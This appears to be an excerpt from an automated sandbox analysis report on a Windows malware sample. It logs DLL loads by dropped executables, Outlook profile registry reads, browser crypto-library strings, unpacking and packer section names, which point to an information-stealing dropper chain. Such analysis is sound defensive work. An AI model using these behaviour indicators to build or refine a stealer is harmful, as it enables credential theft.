Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static file information: File size 3028480 > 1048576

Source: file.exe

Static PE information: Raw size of syfpipoa is bigger than: 0x100000 < 0x2b1c00

Source:	Binary string: mozglue.pdbP source: 232a1df2aa.exe, 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: nss3.pdb@ source: 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: nss3.pdb source: 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: mozglue.pdb source: 232a1df2aa.exe, 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.ae0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.ae0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Unpacked PE file: 7.2.H9TU4oY.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ubvmxkob:EW;xdawalmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ubvmxkob:EW;xdawalmh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Unpacked PE file: 13.2.c1ca3b12e5.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jaliwopm:EW;chtmvbnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jaliwopm:EW;chtmvbnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Unpacked PE file: 14.2.232a1df2aa.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asolipax:EW;akodwsqo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asolipax:EW;akodwsqo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Unpacked PE file: 15.2.c1ca3b12e5.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jaliwopm:EW;chtmvbnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jaliwopm:EW;chtmvbnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Unpacked PE file: 34.2.232a1df2aa.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asolipax:EW;akodwsqo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asolipax:EW;akodwsqo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Unpacked PE file: 35.2.2befb05fec.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W;eacxpgzo:EW;bagugiyz:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Unpacked PE file: 41.2.2befb05fec.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W;eacxpgzo:EW;bagugiyz:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Unpacked PE file: 51.2.c1ca3b12e5.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jaliwopm:EW;chtmvbnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jaliwopm:EW;chtmvbnb:EW;.taggant:EW;

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D3F9590 ?ProcessUptimeMs@mozilla@@YA?AV?$Maybe@_K@1@XZ,?MapRemoteViewOfFile@mozilla@@YAPAXPAX0_K0KKK@Z,LoadLibraryW,__Init_thread_footer,LoadLibraryW,GetProcAddress,__Init_thread_footer,SetLastError,GetProcAddress,FreeLibrary,FreeLibrary,SetLastError,

14_2_6D3F9590

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x2a3521 should be: 0x2a5899
Source: c1ca3b12e5.exe.6.dr	Static PE information: real checksum: 0x1cd2c6 should be: 0x1cd408
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x1a9501 should be: 0x1a9c25
Source: 2befb05fec.exe.6.dr	Static PE information: real checksum: 0x2a3521 should be: 0x2a5899
Source: H9TU4oY[1].exe.6.dr	Static PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
Source: ZiYbk6W[1].exe.6.dr	Static PE information: real checksum: 0x1b27fd should be: 0x1b7bb1
Source: 232a1df2aa.exe.6.dr	Static PE information: real checksum: 0x1a9501 should be: 0x1a9c25
Source: file.exe	Static PE information: real checksum: 0x2e792f should be: 0x2f001c
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2e792f should be: 0x2f001c
Source: ZiYbk6W.exe.6.dr	Static PE information: real checksum: 0x1b27fd should be: 0x1b7bb1
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x1cd2c6 should be: 0x1cd408
Source: H9TU4oY.exe.6.dr	Static PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: syfpipoa
Source: file.exe	Static PE information: section name: kqlprvhw
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: syfpipoa
Source: skotes.exe.0.dr	Static PE information: section name: kqlprvhw
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name: eacxpgzo
Source: random[1].exe.6.dr	Static PE information: section name: bagugiyz
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 2befb05fec.exe.6.dr	Static PE information: section name:
Source: 2befb05fec.exe.6.dr	Static PE information: section name: .idata
Source: 2befb05fec.exe.6.dr	Static PE information: section name: eacxpgzo
Source: 2befb05fec.exe.6.dr	Static PE information: section name: bagugiyz
Source: 2befb05fec.exe.6.dr	Static PE information: section name: .taggant
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name:
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name: .idata
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name:
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name: ubvmxkob
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name: xdawalmh
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name: .taggant
Source: H9TU4oY.exe.6.dr	Static PE information: section name:
Source: H9TU4oY.exe.6.dr	Static PE information: section name: .idata
Source: H9TU4oY.exe.6.dr	Static PE information: section name:
Source: H9TU4oY.exe.6.dr	Static PE information: section name: ubvmxkob
Source: H9TU4oY.exe.6.dr	Static PE information: section name: xdawalmh
Source: H9TU4oY.exe.6.dr	Static PE information: section name: .taggant
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name: .idata
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name: frbjvewh
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name: odinhcyc
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name: .taggant
Source: ZiYbk6W.exe.6.dr	Static PE information: section name:
Source: ZiYbk6W.exe.6.dr	Static PE information: section name: .idata
Source: ZiYbk6W.exe.6.dr	Static PE information: section name:
Source: ZiYbk6W.exe.6.dr	Static PE information: section name: frbjvewh
Source: ZiYbk6W.exe.6.dr	Static PE information: section name: odinhcyc
Source: ZiYbk6W.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: jaliwopm
Source: random[1].exe0.6.dr	Static PE information: section name: chtmvbnb
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name:
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name: .idata
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name:
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name: jaliwopm
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name: chtmvbnb
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: asolipax
Source: random[1].exe1.6.dr	Static PE information: section name: akodwsqo
Source: random[1].exe1.6.dr	Static PE information: section name: .taggant
Source: 232a1df2aa.exe.6.dr	Static PE information: section name:
Source: 232a1df2aa.exe.6.dr	Static PE information: section name: .idata
Source: 232a1df2aa.exe.6.dr	Static PE information: section name:
Source: 232a1df2aa.exe.6.dr	Static PE information: section name: asolipax
